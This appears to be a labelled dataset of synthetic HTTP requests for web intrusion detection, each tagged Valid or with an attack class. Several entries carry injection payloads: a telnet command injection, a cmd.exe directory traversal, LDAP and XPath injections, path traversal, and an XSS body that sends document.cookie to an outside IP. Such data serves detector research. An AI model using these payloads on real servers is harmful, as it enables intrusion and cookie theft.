If-Modified-Since: Sun, 11 Oct 09 11:36:52 GMT
If-Unmodified-Since: Tue, 16 Mar 10 03:14:06 CET
If-Match: *
If-None-Match: *
If-Range: "pUXiYpH3If.YPIoT"
Max-Forwards: 61
MIME-Version: 7.5
Pragma: 9aDe='gypl'
Proxy-Authorization: Basic ZG5yVzphZGxldHk=
Authorization: Digest nc=1Acd46dA
Range: 98709-37276,-196
Referer: /souwl.doc
TE: trailers,trailers,chunked;q=0.0
Trailer: Host
User-Agent: Mozilla/4.2 (X11; U; SunOS sun4u 0.3; Mm-ee; rv:6.4.6) Gecko/94401006
UA-CPU: Sparc
UA-Disp: 662,803,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 0320x5347
Via: FTP/1.1 www.Spissoi.gif, HTTP/8.6 132.236.131.185
Transfer-Encoding: compress
Upgrade: zoadt/1.0
Warning: 241 www.rpshelf.shtml "ImulXdfh" 
X-Forwarded-For: 91.199.65.166
X-Serial-Number: 267270605384116
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12856
Start - Id: 10895
class: Valid
GET /hd0nc9/cBdqF_k91IgBciwi/eHtACR_/erYBVulc/7Y/gkJA_CYfSSU9X/kitz/qyo6etu/Lbbetween39u8NG/aKXErBH6BKdIYm/iosIjErwrstT.dll? HTTP/1.1
Host: 199.82.30.1
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: rurO-em8thn;q=0.6, ec0t-ahteded;q=0.0, e-h1tsmwc;q=0.4
Cache-Control: min-fresh=844
Client-ip: 154.30.238.254
Cookie: igoshuj911dsu=3685;likeLDbRP=12973
Cookie2: $Version="5"
Date: Thu, 25 May 06 22:48:34 UTC
ETag: W/"H7IrqR3HHE8Zo6u5Q2bJ"
Expect: krhw
From: 9Ytl@niohHlSiyq.uk
If-Modified-Since: Thu, 24 Mar 05 04:01:20 CET
If-Unmodified-Since: Tue, 06 Oct 09 02:20:57 CET
If-Match: *
If-None-Match: *
If-Range: "6iHZQp-Ec2Teu45Y."
Max-Forwards: 496
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: atsuIo ssTe=rsipu
Authorization: NTLM Ym50Y3phcmVlaVNhTGVuZXRabGR6bFJrc2VldXNuc2JpM2ZvbmxMcmFlaWV0
Range: 7-
Referer: http://hro3l.it/x3tUEe/csnhe/Ientst.php
TE: chunked
Trailer: Accept-Language
User-Agent: tira/4.9.5.2.7
UA-CPU: PowerPC
UA-Disp: 6034,236,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 488x175
Via: FTP/3.2 www.8ioc5.jpg, FTP/1.0 www.to5ts.gif, FTP/1.6 97.148.239.98
Transfer-Encoding: nqnr
Upgrade: zitfn/8.6, ijcqg/4.3
Warning: 613 www.Aryigoac.js "2cEetAr" 
X-Forwarded-For: 250.170.187.7
X-Serial-Number: 70193457062638076597
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10895
Start - Id: 43313
class: OsCommanding
GET /pdYFeaBLT4rWN/item6.css?23fHexecPSQI=hrtnphael6aco&5ndhe=iku&bai=8525&si=%22++%3Btelnet++119.189.95.128+++80+%3B HTTP/1.0
Host: www.ohat.org:1132
Connection: close
Accept: application/*;q=0.7
Accept-Charset: *;q=0.4
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.6
Cache-Control: vsse='evi'
Client-ip: 170.237.233.234
Cookie: oih2U7wa662nw=46;VfM9E.cgy=RlSo1E7|e
Cookie2: $Version="3"
Date: Mon, 02 Jul 07 23:44:49 UTC
ETag: "_3UpwIcb6mNaMxm3B"
Expect: 100-continue
From: ehhmnsme@ohym.uk
If-Modified-Since: Mon, 05 Nov 07 12:07:17 GMT
If-Unmodified-Since: Thu, 12 Jun 08 09:10:20 GMT
If-Match: "kGvRsVWc@NiNQjbrL0oS"
If-None-Match: "nUppEZN3GQl8plCQ5OuZ"
If-Range: Thu, 04 Feb 10 05:59:42 CET
Max-Forwards: 433
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: NTLM RW43ZWkwbGFydGlvYWppdEVyNmJ3NG1hcmVsT2FkaDJq
Authorization: alkai vodbytu=ohto
Range: 398265-
Referer: /ntv0/e0sr0.php4
TE: gzip;q=0.6,trailers,trailers
Trailer: Cache-Control
User-Agent: Mozilla/8.2 (compatible; Konqueror/9.3; Unix; ru9m; itzi; tcce4f)
UA-CPU: StrongARM
UA-Disp: 260,218,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 3321x719
Via: ewt/6.6 www.Risghrds.htm
Transfer-Encoding: tttnd
Upgrade: eCaleh/5.6, orv/6.7, AtlTSf/2.9, td7/4.6
Warning: 340 70.211.150.134 "niennyh9eom" 
X-Forwarded-For: 213.135.117.46
X-Serial-Number: 0027347
----: -------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 43313
Start - Id: 574
class: Valid
GET /uKwudlzwZG6B84ZP/vactythduainz/o7Pxp_RtZag/f3W/uXAIl2T/ogdTgtriiI2e9h/ztt0OWvRQ9b/CsgVpNT-Ad/nZy8xMk3u0mJD1SmP.aspx? HTTP/1.0
Host: 4.144.140.31
Connection: reTabsa
Accept: */*;q=0.0
Accept-Charset: big5
Accept-Encoding: *;q=0.1
Accept-Language: *
Cache-Control: max-age=4
Client-ip: 149.215.56.244
Cookie: Jce6anWbrf=yhmai sbdune9x:;H9eLyrTsi=3;lJO6rMjS8OrI=ei
Cookie2: $Version="8"
Date: Sat, 24 Sep 05 20:04:24 CET
ETag: W/"ln37JRy0Pdvd44lMwj2"
Expect: 100-continue
From: nsineld@Rnhcetdcc.uk
If-Modified-Since: Thu, 19 Jan 06 16:58:34 CET
If-Unmodified-Since: Fri, 12 Jun 09 22:56:15 CET
If-Match: "erkvh2v.R91YmCp"
If-None-Match: "Im2bN5EGqp.IRyocyYf"
If-Range: Fri, 17 Nov 06 10:23:12 CET
Max-Forwards: 89
MIME-Version: 4.0
Pragma: 9osaeS=2u9RWgm
Proxy-Authorization: Digest uri=/enctRmn/arosaun.bin
Authorization: ooer arxl=7xVfetts
Range: 31686-
Referer: /1iope/a16auni/Uerc/g4fs/irgt.aspx
TE: deflate,deflate;q=0.6,trailers
Trailer: Date
User-Agent: cV8Q@Q@8 http://www.ikrsnnS.st
UA-CPU: MIPS
UA-Disp: 233,014,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 412x961
Via: eodi/3.8 www.mjRemot.css:3, HTTP/1.1 www.he4A4.shtml:19699, s4tAc/3.5 www.ctoes.jpeg:981
Transfer-Encoding: compress
Upgrade: geg/6.2
Warning: 879 189.81.186.199 "avre8nued7emEtaw" "Thu, 06 May 04 10:57:00 UTC"
X-Forwarded-For: 248.12.237.242
X-Serial-Number: 602347866565729
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 574
Start - Id: 5475
class: Valid
POST /lPb_N5i@/dbd/pi/FL/h1uKmdnoesG/t3RExqv_lF/t9woGeowtR4R/gGcJXB1d4ujO3W4-ySye.php? HTTP/1.1
Content-Length: 19
Content-Language: iTsceTt,sysoEP,9sne
Content-Encoding: identity
Content-Location: http://www.oie2.cz/Kcigo/ze0ea/lneTiuar/dnae8ei/ttLsiiwm.wmn
Content-MD5: UGZGYXRlMGNlbG9lZW5ydQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 29 Dec 07 09:40:06 GMT
Last-Modified: Thu, 08 Jan 09 18:57:18 CET
Host: www.mnog.ch
Connection: keep-alive
Accept: text/*, text/*;q=0.3, application/*;q=0.6
Accept-Charset: windows-1257, ks_c_5601-1987;q=0.7
Accept-Encoding: *;q=0.0
Accept-Language: nrA-cL, i-lhat84e;q=0.7, 0ati5oe-3hkx, io-ilyeaTED, admnrNcB-ahDrspi
Cache-Control: no-transform
Client-ip: 150.73.146.141
Cookie: aOhgkwedhras=khdIaOettn le;denu=8)7vbscripto;texfoij=uAuolprklrn
Cookie2: $Version="6"
Date: Mon, 26 Mar 07 19:00:14 UTC
ETag: W/"yeToIhRYJ2ge3RgehuiR"
Expect: 100-continue
From: lczro@ehIntmhe.com
If-Modified-Since: Thu, 30 Mar 06 20:56:04 UTC
If-Unmodified-Since: Wed, 12 May 04 20:24:55 UTC
If-Match: "IqPWkoeOKNIYhcez4kLi"
If-None-Match: "qSurb9MEQ8YmghMr"
If-Range: Thu, 05 Jun 08 16:12:01 UTC
Max-Forwards: 514
MIME-Version: 2.8
Pragma: cbrAd6=oaabecse
Proxy-Authorization: ksiih lttrsD=rNe6
Authorization: NTLM dnJoZXhwdG9oMGhkMmVvdG1tMGVjaG9hbnM1RFN0ZXR5Zm9nZQ==
Range: 25867-
Referer: /lte3oe/rrlm/tsyd/eriujet/Tsgf.mpeg
TE: chunked;q=0.5,trailers,trailers
Trailer: Max-Forwards
User-Agent: fn9r/7.4.5.8
UA-CPU: StrongARM
UA-Disp: 4898,121,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 2622x170
Via: FTP/5.5 57.210.63.46
Transfer-Encoding: gzip
Upgrade: iashj/1.2, vlrlkr/1.0, tesek/2.7, haauNe/7.3
Warning: 081 www.m8rn1rmo.shtml:31303 "6h7tteywuheldre" 
X-Forwarded-For: 16.29.207.187
X-Serial-Number: 56905023798190
----: ---------------------
~~~~~: ~~~~~~~~~~~

baAee1Neatw8igq=)

End - Id: 5475
Start - Id: 36993
class: LdapInjection
GET /a05VvSKAb.css?nernii=45401&rcNdthi=%29++%28%7C+++%28displayName%3Dhad*%29++%28name+%3Dhad*+++%29%28++mail%3Dhad*%29 HTTP/1.1
Host: 211.230.110.126
Connection: close
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: min-fresh=8
Client-ip: 9.220.179.73
Cookie: eviYuylr5=054236;omiiee9dvn=sCxe
Cookie2: $Version="0"
Date: Thu, 20 Mar 08 11:42:31 UTC
ETag: "B8E.sqhQTxd1WRrRZqJv"
Expect: gsYli
From: nlnE@rejed1gea.uk
If-Modified-Since: Tue, 05 Apr 05 12:42:11 GMT
If-Unmodified-Since: Sun, 30 Jul 06 07:30:50 CET
If-Match: *
If-None-Match: "ZKH_-y9Yd-._F82"
If-Range: Sat, 15 Nov 08 05:56:45 UTC
Max-Forwards: 43
MIME-Version: 5.8
Pragma: 94o8dm='fn'
Proxy-Authorization: Basic YXRwaTowSWV5OGxj
Authorization: Basic aThpYWVoOlRvaXJvZQ==
Range: 84-,-422477,1197-5319
Referer: /bi6iD.avi
TE: trailers
Trailer: User-Agent
User-Agent: Mozilla/2.5 (Windows; U; Windows NT 2.5; r7-dh; rv:7.6.9) Gecko/14262411
UA-CPU: MIPS
UA-Disp: 2667,8228,8
UA-Color: color8
UA-Pixels: 391x727
Via: loi/9.3 135.61.31.29, 3.4 www.cSreauo3.png, 8.1 www.eehoDnoi.tiff
Transfer-Encoding: deflate
Upgrade: Rtes2e/0.8, Uappi/6.8, oe526/7.2, eoop6g/8.7
Warning: 135 249.137.139.161 "EeTeptifzxaoiar" "Fri, 26 Jun 09 16:27:58 UTC"
X-Forwarded-For: 106.206.209.192
X-Serial-Number: 0781389574649
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 36993
Start - Id: 37477
class: LdapInjection
GET /riGQNE/c5rF/knBssdrusnzeguhr/ko14nQvHwHc-IY6/_ah8xKl5DBSHWRP/ss11/wf7DQsIDtDC645FxUq@/y8MCgyEIkXK5uZlVK.js?PeG0=8614&gh=eYM&npdhvpcuydee2=reeseaAeautoexecftpEaT&qsengrn7hhr=sY0wo2Zm&aitefsa=i&aenscoafnM3=7042&VE9HbhU=%28e-e2it&ratQ=lCMHu&nHAidkecUt=98&eiee=eFL_Gtbvs2&enis0eEnmpd=80248&-cnc-=n+y HTTP/1.0
Host: 96.71.209.227:236
Connection: oisqdeai
Accept: */*
Accept-Charset: windows-1255
Accept-Encoding: *;q=0.2
Accept-Language: rfh1-aefefbze;q=0.4, raeny-eg;q=0.4
Cache-Control: max-age=3
Cookie: Heiuoiebbt2On=rT6;atHhstdsLtegas=")(targetfilter=(o=NetscapeRoot));g7vO-doqrhhavingn=9161
Cookie2: $Version="465"
Date: Thu, 21 Apr 05 22:32:46 CET
ETag: "F40ZP5Gqd7KFnZ8x@NSU"
From: tmati@entc45i.fr
If-Modified-Since: Thu, 24 Mar 05 23:05:38 GMT
If-Unmodified-Since: Sat, 23 Jan 10 12:29:48 CET
If-Match: *
If-None-Match: *
Max-Forwards: 4
MIME-Version: 5.3
Pragma: no-cache
Authorization: Basic b2V0bTp1amVpaQ==
Referer: http://www.Taiestei.com/dwqgh.bin
TE: chunked;q=0.7,trailers,trailers
Trailer: Upgrade
User-Agent: Mozilla/6.7 (compatible; tesu0apome; Open BSD i586; TheS2hh5; httoe)
UA-OS: Windows 95
UA-Color: color16
Via: HTTP/0.3 194.114.90.93, 3.1 www.Mleikjh.shtml, 3.5 www.n7gNebew.css
Transfer-Encoding: compress
Warning: 456 63.248.211.211 "dhhovt8o1H7" "Thu, 11 May 06 01:33:00 UTC"
X-Forwarded-For: 84.127.146.130
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37477
Start - Id: 44459
class: OsCommanding
GET /scripts/..%5c%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.5neh.cz
Connection: keep-alive
Accept: video/quicktime;q=0.2, text/html;q=0.0, audio/*
Accept-Charset: utf-8;q=0.2, isiri-3342
Accept-Encoding: identity, identity
Accept-Language: *
Cache-Control: max-stale
Client-ip: 1.111.16.222
Cookie: saaNuo=4\e;tesboblORmpsldo=92887;tpie=thAl;tTrsmnyal=diae5bttEitmP~;Iesoeae2ngfalth=r7
Cookie2: $Version="827"
Date: Mon, 04 Dec 06 20:41:08 GMT
ETag: "ThoS9sljlpyhPMguDr"
Expect: 100-continue
From: bniw@mamjmaT.net
If-Modified-Since: Wed, 19 Aug 09 21:49:32 UTC
If-Unmodified-Since: Wed, 06 Jul 05 14:50:50 GMT
If-Match: ".7wk_ABn1mKSYzp"
If-None-Match: *
If-Range: Sat, 17 May 08 09:59:05 UTC
Max-Forwards: 50
MIME-Version: 3.4
Pragma: trzin='etkp4ct'
Proxy-Authorization: Basic TzJicGU6ZXVndHJa
Authorization: NTLM bk04aDdycGZlb2lubGF0ZjRvaGxpdmR1OHNPaHRmU3Q=
Range: 6-02287,72753-
Referer: http://ivhs.ch/ohOl/eesoo/qisoanBn/ueemtese.jpeg
TE: gzip
Trailer: Expect
User-Agent: oQWJMFXjY http://www.lldrd.it
UA-CPU: Sparc
UA-Disp: 6571,8343,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 448x826
Via: 8.9 www.ri2rtnT.htm
Transfer-Encoding: deflate
Upgrade: n7n4g/9.8, isEasp/0.6, dOHut/7.0, ywG/7.6, sesne/6.3
Warning: 437 173.103.168.4:0949 "sd9tmoa" "Tue, 17 Aug 04 10:18:28 UTC"
X-Forwarded-For: 107.82.88.187
X-Serial-Number: 022178
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44459
Start - Id: 35619
class: XPathInjection
GET /mhF9dFpxjpcnq/o0g_MlLb6@aw/amKwTgvZVONNVQ17MB4r.htm?oeneahrMchh=he+s3vbscriptatttidia%5Bqd%29&aetyesntN0eai=nx9&asiefaeaehE=%28i++%3C+++++count%28fo0%2Fchild%3A%3Atext%28%29%29+++++and++++j+%3C++++count%28vin%2Fchild%3A%3Acomment%28%29%29++++and+++++k+++%3C++count%28anser%2Fchild%3A%3A*%29+%29&JnpasswdECa=4791486288&osesnbloNwn=16&o9ptnoshTW0ze=2654317&Kq4sreplace_=tY.gbgoI%40&Nzt=aqq0YB-RFy&W_MsKf._U.L0=+d1&2raKq=utyehm&dlsalrena=1%3Dnuiadr&N5rsb3lrji=48&RimgTItCaccepto=nsbnIsw3e&6rO@8=ratrlaBerlee%3Ere&lhctcntRta7E=t%3BntTdelete%3Dtns%2Bj2-e HTTP/1.0
Host: 241.229.143.226
Connection: keiin1sT
Accept: application/zip;q=0.1
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: max-age=48753
Client-ip: 98.222.4.65
Cookie: l1=tttjtdrqakbswt;HxTNRW9IMWo=swc
Cookie2: $Version="65"
Date: Mon, 03 Apr 06 07:04:45 CET
ETag: "RYacUA-H4AY88YE"
Expect: 100-continue
From: orei@biOfnOuc.com
If-Modified-Since: Fri, 20 Jul 07 03:01:23 GMT
If-Unmodified-Since: Mon, 17 Mar 08 01:25:30 GMT
If-Match: *
If-None-Match: "GYvZt0FQnsL2HkwjMVKZ"
If-Range: Fri, 23 Apr 04 22:46:36 UTC
Max-Forwards: 8
MIME-Version: 1.3
Pragma: abs='4gy'
Proxy-Authorization: Basic c3l0ZWVBdDI6YU5paXRm
Authorization: Basic M3NvdG06aWlkbWVxYW4=
Range: -827333,2893-
Referer: http://www.ohtoetHr.cz/u3oegZ2/rsbaaGy/rtc5e0T/i6ire/ngarsie.js
TE: trailers
Trailer: Expect
User-Agent: asNq/3.6.9.0.4
UA-CPU: Sparc
UA-Disp: 458,730,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 817x128
Via: FTP/2.7 38.36.106.94, FTP/3.1 51.195.33.2, 8.1 111.54.109.236
Transfer-Encoding: fese
Upgrade: sivn/3.0
Warning: 510 208.23.212.198:55713 "gsNb3nolnttct" 
X-Forwarded-For: 163.147.115.220
X-Serial-Number: 65275952070459353
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35619
Start - Id: 45920
class: PathTransversal
GET /hTmdv0aAOgPyhfnxk/rvHeSy/hijtnucbb0odkoa8/toetltSfmx.php3?td13ia=hme+&otnqt=94362&nvDZUopE8pth=u%3A%5Cautoexec.bat HTTP/1.1
Host: www.f6hf.de
Connection: qnas6tr5
Accept: image/*;q=0.5, video/*
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: 34-0bnes;q=0.4, 9-eus, rem4tets-eree;q=0.7, b-ende;q=0.5
Cache-Control: no-transform
Client-ip: 81.172.25.192
Cookie: aiDvs=hhotriehiPcf
Cookie2: $Version="3"
Date: Mon, 22 Mar 04 13:44:36 UTC
ETag: W/"mLsp4l@CbIwwgt7c-"
Expect: 100-continue
From: leat@aeegln9ow.cz
If-Modified-Since: Sun, 10 Oct 04 22:49:14 UTC
If-Unmodified-Since: Tue, 12 Feb 08 07:29:37 GMT
If-Match: *
If-None-Match: "nxwBQQXr5Hx9cWa"
If-Range: *
Max-Forwards: 584
MIME-Version: 1.5
Pragma: ya=aua
Proxy-Authorization: omjasV v1Eoao=notim
Authorization: Digest qop=egnlfi
Range: -106180,0973-,3598-
Referer: http://hwehshc.it/ievseet/91ftlg8.swf
TE: chunked;q=0.6,deflate;q=0.8
Trailer: Max-Forwards
User-Agent: u0ea/8.5
UA-CPU: 68000
UA-Disp: 1794,840,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 880x5284
Via: 7.7 255.201.100.218, 4.2 www.sustCznI.jpg, HTTP/3.6 51.175.98.43
Transfer-Encoding: Afso; hr3yea=t1jia
Upgrade: dhvol/0.8, Pde/4.9
Warning: 050 www.ecuV.tiff:35147 "8mslZ" "Thu, 18 Sep 08 24:48:34 UTC"
X-Forwarded-For: 210.181.84.191
X-Serial-Number: 715330032292
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45920
Start - Id: 11609
class: Valid
GET /ouZros0lfeigoecfT/gZ@VxXWcmy0IM/o2iOep3ss/xa9iahctdieaoI5/JxmKoUXPimgK8WWgj.html?axNd=%40fpasswdrb&aaSeAuuwraeoylt=oLcJCPscO&mhs4=rNh&4oweh6aha=1101015&LMXL-kFp=y%40iinec&amhip=zQZ-f&olnehsirmHu0=4&qzH.likeTOLzN=j1c.NOdJ&imnNwnuhenm=400485&ubuyfxanhiob=insert%5Ctt&unLcrece=a%3Dcef&eppo1e2tel=al4oeutmiu&ElaASyyF1=9&2qNCNsjJoe=ic2%28%29I&tGhaTe=7011 HTTP/1.1
Host: 220.46.70.228:4752
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 53.107.242.2
Cookie: 3dewiancm=277989221;Eel4l=170440;3atNzm=tsimeco;0yamnaclme5c=%;coli=qtm inpn;btsfhcOel=chqhPt0f3iykt
Cookie2: $Version="139"
Date: Sat, 21 Feb 09 23:33:21 CET
ETag: W/"jq@c8vo3UmiE6nU"
Expect: 4torca=woCrAo;u1bupeH=pmtE0Eeo
From: ein5sen@mpuh.uk
If-Modified-Since: Mon, 24 Oct 05 03:32:54 CET
If-Unmodified-Since: Mon, 16 May 05 20:19:29 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 553
MIME-Version: 0.8
Pragma: e2oet='mae'
Proxy-Authorization: NTLM a3NlOWlld3IxbVRlcU91ZWNndG9tVG9vYWYyZGFUZXRwZHJvY2hzZXlpZXJ0
Authorization: Basic alB4cDpscmV0aWE=
Range: 4539-2283,-21
Referer: http://pokjsrac.gov/Esjw/bcnvtpi/dbryia.jpg
TE: deflate;q=0.3,gzip;q=0.8
Trailer: If-Unmodified-Since
User-Agent: ls6de8pn
UA-CPU: StrongARM
UA-Disp: 3478,401,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 3585x2586
Via: FTP/9.4 www.7tohod.gif, nroti/7.1 18.62.34.45:4
Transfer-Encoding: eehmm
Upgrade: te8ac8/1.9, wxL/4.7, hheCRo/8.9, yto/8.6
Warning: 857 www.weac.gif "Cdlyhd" 
X-Forwarded-For: 61.41.0.191
X-Serial-Number: 046539438868930
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11609
Start - Id: 34644
class: Valid
PUT /rTMFxtelnet/dLO43X1Xan1g0tFz/vm/2KRH8GaIwRN_fcHJ1k/yQe21LZftpeQvYoZ/aelaoe8h/Nt3dAccsn8ioy/et/boot.inijy.php3? HTTP/1.0
Content-Length: 176
Content-Language: qtslu
Content-Encoding: deflate
Content-Location: http://www.haiyn5Nh.fr/rtdMiQ/tItose2/ladaTleI/hirt/tfgEee.jpg
Content-MD5: YWlkaUloaDhjbHV0QXJtYg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 08 Feb 05 06:09:24 CET
Last-Modified: Sun, 07 Dec 08 23:19:29 UTC
Host: 30.18.225.173:29338
Connection: close
Accept: */*
Accept-Charset: cp-936;q=0.3, iso-8859-7
Accept-Encoding: 
Accept-Language: w0srna-drreyso, rin-z
Cache-Control: no-cache
Client-ip: 67.93.72.22
Cookie: idNk=lNe;n3axxntOns=@Rdalkd<xrro;ceYay=mabN lnIwhere
Cookie2: $Version="9"
Date: Mon, 16 Jan 06 01:21:57 UTC
ETag: "qe_7hAVu7Wn2tFiI"
Expect: 100-continue
From: 58h33lcc@coecl5g.org
If-Modified-Since: Wed, 21 Jul 04 02:41:06 GMT
If-Unmodified-Since: Fri, 02 May 08 05:10:03 CET
If-Match: *
If-None-Match: *
If-Range: "1NNvjpxSHlqz6V0gVE@P"
Max-Forwards: 3
MIME-Version: 1.7
Pragma: no-cache
Proxy-Authorization: Basic ZWFicElhTDo3aW9ubQ==
Authorization: Basic RXRzczpiZXRsb2U=
Range: 83-,0-,-256789
Referer: http://vswTud.st/mek1ni/oriu/Estyaf/eqarjxms/rreonie.exe
TE: deflate,chunked,trailers
Trailer: Accept-Encoding
User-Agent: tmwsP/1.9.8.8
UA-CPU: PowerPC
UA-Disp: 379,2037,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 3397x406
Via: 9.6 www.htr2nnrp.css
Transfer-Encoding: gzip
Upgrade: 0lmc/3.2
Warning: 527 76.238.80.61 "hris94" 
X-Forwarded-For: 139.243.218.142
X-Serial-Number: 09613
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

laoesgw=hnarhQi&met=zhTNzEA&eenhoRipnve=hno5 tciynelcmocha  tth&jY5zdS4b6XdH=8155025456&HUtL3D0=053256&ur=g eisstylep6&o97UP=hlliwetetUnedah&oahnacfhhhh=78&rfmypon2hsx=otac4tui

End - Id: 34644
Start - Id: 46893
class: XSS
POST /sqwcrZfdtitEhk85_T/reMRROYaMG1V@/obBZnPX-EY.HXd.exe? HTTP/1.0
Content-Length: 321
Content-Language: eaotvd8,I6c
Content-Encoding: identity
Content-Location: http://esophy.biz/lwiq4sh.jsp
Content-MD5: dW9TbjFoaG5pbWVpbmFubg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 01 Mar 09 03:37:36 UTC
Last-Modified: Wed, 11 Jul 07 23:56:22 UTC
Host: 41.208.17.132
Connection: keep-alive
Accept: text/*, video/quicktime;q=0.3, image/*
Accept-Charset: *
Accept-Encoding: *;q=0.1
Accept-Language: nppI-iuie;q=0.2
Cache-Control: no-store
Client-ip: 164.249.24.153
Cookie: dPo=yFL7Yn8sjtuI
Cookie2: $Version="07"
Date: Mon, 29 Jan 07 07:35:49 UTC
ETag: "NzR-ApOJwLt0kq3"
Expect: 100-continue
From: nbfea3@yM2KA0.biz
If-Modified-Since: Tue, 03 Jan 06 17:07:34 GMT
If-Unmodified-Since: Tue, 02 Sep 08 16:47:06 CET
If-Match: "pnDiXMSWaz02KzTcSk-2"
If-None-Match: *
If-Range: *
Max-Forwards: 484
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: Basic Y2VsZ2luZTpmYW5vOUUz
Authorization: f77db aetmsn=Lobo5twv
Range: -1
Referer: /de9k/ouohgk/aeocnTb/huh3boei/ee0miocd.mdb
TE: trailers,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/4.9 (Machintosh; U; PPC 8.9; dr-oe; rv:8.0.9) Gecko/83904655
UA-CPU: MIPS
UA-Disp: 457,6373,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 1098x449
Via: tWfos/8.2 250.12.26.107, sar/1.4 111.11.79.32, 8.3 19.189.58.4
Transfer-Encoding: compress
Upgrade: c7hl/0.0, ojnjz/4.8, sotds/6.5
Warning: 749 124.119.94.150:741 "rcapb76l7ke" "Tue, 13 Dec 05 01:19:14 GMT"
X-Forwarded-For: 59.28.178.137
X-Serial-Number: 93268691782079750245
----: ------------------
~~~~~: ~~~~~~~~~~~

btagayamequsa=76&di=<style  type =  "     text/javascript   "  >[window.open('http://90.255.210.242/aticon.bin'+document.cookie);]</style   >&BBnwKM8=oudo ls&KVOr-vfromS=lWxq&oet3nsntil=ey0U7Ym5tA&3JK.0boot.iniUo8z=rmhitoU&ooneehsa=4&M6SKtu=o0dt&6ltcyrae0nfo=tb&homfuetal=6cm(y

End - Id: 46893
Start - Id: 34551
class: Valid
PUT /peaktg/zyiayr0lNkU7X.jpeg? HTTP/1.0
Content-Length: 49
Content-Language: oe,ejtyam,aUei
Content-Encoding: gzip
Content-Location: http://EioCo.be/aott/46yr.cfm
Content-MD5: ZXRvZG5lbmlhbnRhdXJkZA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 16 Jun 08 19:20:34 CET
Last-Modified: Sun, 06 May 07 18:53:04 UTC
Host: www.egknnhy8.com
Connection: uhrludym
Accept: video/*;q=0.9, application/*;q=0.8, application/*
Accept-Charset: iso-8859-8-i, x-mac-roman;q=0.5
Accept-Encoding: gzip, gzip;q=0.8
Accept-Language: no-t3;q=0.3, aaUicp6w-witg0E, 5mEpe-ld;q=0.2
Cache-Control: no-transform
Client-ip: 142.252.150.238
Cookie: sO4Tre=6l+i'winnt;lwevgn2d=itl84ofeoe9bNiihhU;uwO18jhtaccesV=3ten;sclv=a;f0etfdoew4Soo=&/
Cookie2: $Version="3"
Date: Sat, 24 Apr 04 19:39:53 CET
ETag: W/"U2@K3@0V_RkufNecnm"
Expect: yiqyob
From: r4o9@ecoOy.ch
If-Modified-Since: Wed, 20 Feb 08 05:51:52 GMT
If-Unmodified-Since: Wed, 30 Apr 08 01:01:52 GMT
If-Match: "arvvYnkHdU4a--Ia"
If-None-Match: "VzPrdL0r3vyJq45iGdz"
If-Range: Thu, 17 Jun 04 05:33:31 CET
Max-Forwards: 669
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: NTLM bGNobmljaGtpdFJ4a0tDY2hsbmxGaHI1dG15ZWVjbm9hdHNjbw==
Authorization: Digest cnonce="daLd"
Range: 700959-,22-,44069-
Referer: http://www.ayneoct.fr/bll4/e9hExh.jpg
TE: chunked;q=0.9
Trailer: Via
User-Agent: Mozilla/4.0 (compatible; MSIE 5.3; Linux i586; g8eqatooic; tffzOt)
UA-CPU: Sparc
UA-Disp: 225,732,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 066x785
Via: HTTP/1.1 185.144.75.213
Transfer-Encoding: identity
Upgrade: nsrg/4.0, ieR/8.7, bte/5.1, eocer/6.3, rohet/6.9
Warning: 065 65.77.102.167 "nhro5a2" 
X-Forwarded-For: 46.232.250.126
X-Serial-Number: 52771929
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

iRnrut1rLdame=536577&D.mailxmlOaCQ2ksf= m&netaa=s

End - Id: 34551
Start - Id: 23668
class: Valid
GET /zn/enX.pl? HTTP/1.0
Host: www.etrd.gov:53
